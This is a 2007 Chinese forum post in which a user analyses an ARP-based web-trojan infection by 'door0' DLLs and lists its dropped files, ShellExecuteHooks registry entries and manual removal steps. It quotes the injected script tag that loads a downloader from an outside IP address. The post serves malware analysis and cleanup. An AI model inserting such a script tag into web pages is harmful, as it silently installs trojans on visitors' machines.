下沙论坛

 找回密码
 注册论坛(EC通行证)

QQ登录

QQ登录

下沙大学生网QQ群8(千人群)
群号:6490324 ,验证:下沙大学生网。
用手机发布本地信息严禁群发,各种宣传贴请发表在下沙信息版块有问必答,欢迎提问 提升会员等级,助你宣传
新会员必读 大学生的论坛下沙新生必读下沙币获得方法及使用
查看: 2704|回复: 0
打印 上一主题 下一主题

变名door0恶意dll木马(arp挂马)详解

[复制链接]
  • TA的每日心情
    奋斗
    10 小时前
  • 签到天数: 2384 天

    [LV.Master]伴坛终老

    跳转到指定楼层
    1
    发表于 2007-9-16 04:32:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

    不是 arp 欺骗  是arp挂马

    arp挂马的意思是说 只要你浏览他设定的网页 全部带有挂马信息  如果你在本机开了服务器,别人浏览你的网站 同样会带有挂马信息  但是你打开你本机上的网站源代码却没有这些挂马语句。

    我也中了这个木马  不过是在虚拟机下中的 现正在研究中

    中毒现象为:
    1、用IE内核浏览器浏览百度 瑞星 等等网站时 网页头部会被嵌入
    <script src=http://67.19.116.187/1.js>

    2、上面那个文件是用来下载其他木马 主木马和所下载木马全为dll木马 主木马只有一个功能:就是进行欺骗 使之下载其他木马
    感染主木马后重起一次后生效,开始下载辅助木马,这个主木马也是隐藏最深的。它也会使所有使用javascript的页面受到部分影响比如我的百度空间就 没办法发表文章了。

    3、再来说说后来下载的这些辅助木马
            
    这些木马位置为:系统盘:\Documents and Settings\当前用户名\Local Settings\Temp 下

        建立 1.exe~11.exe 以及两个~*.tmp文件。
            在%systemroot%下建立
            wodoor0.dll
            dhdoor0.dll
            qjdoor0.dll
            wddoor0.dll
            tldoor0.dll
            zxdoor0.dll
            mydoor0.dll。

            这些dll文件会把自己插入到 explorer 进程中,如果你启动regedit它们同样会被插入到regedit中
            同时在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks 下 建立启动项:
            {08E909A4-B236-48DD-8BCC-90A604B93E68} 数值为:hook tl
            {0DAEBA6A-86CA-4B96-AF96-0C8C2C358FBD} 数值为:hook dh3
            {4E3FBFA4-F1CC-4B66-B333-B9F0FF4B4748} 数值为:hook my
            {5731EA1D-6AAF-4DE9-BDDA-7B390A75B286} 数值为:hook wo
            {6826A3DB-EA8E-4E67-880D-53D04C7C0BD8} 数值为:hook qj
            {781FBCC1-99C7-4AE0-95F7-66EA49E86DD7} 数值为:hook zx

    治标不治本的解决办法

    1.如果你管理员用户有两个(没有的话现建个),进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks  点右键->权限  找到你当前登陆的用户名 将 完全控制读取 两个属性 勾上拒绝! 然后再找到regedit.exe-->创建快捷方式 在属性-->高级里 选上 用其他用户打开 双击这个快捷方式,输入你另一个管理员帐号和密码 把 ShellExecuteHooks 下 那几个键值删除。

    2. 和上面同样原理,设置 system32目录的安全选项卡(右键--属性---安全[安全选项只有NTFS分区才有,如果你是NTFS分区又没有安全这一选项,请在"工具-文件夹选项--查看"里把"简单文件共享"前面的点 去掉])将当前用户权限的 完全控制 点上拒绝,然后找一个能进行文件操作的程序 譬如:冰刃 创建快捷方式,用其他用户打开,然后现在的用户用进程管理器将explorer结束,再然后使用冰刃 删除掉 system32下的那些*hook.dll文件。

    3、清空Temp文件夹,删除windows下的~*.tmp文件4、打上系统补丁,使用非IE内核的浏览器上网。

    这只是治标不治本的方法,那个主要的病毒依然存在,网页依然有嵌入的挂马语句, 用IE内核浏览器还可能再下载其他病毒。

    我发现了几个主病毒的可疑位置,再看看 一会把它们发上来。
    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏 分享分享 顶 踩

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表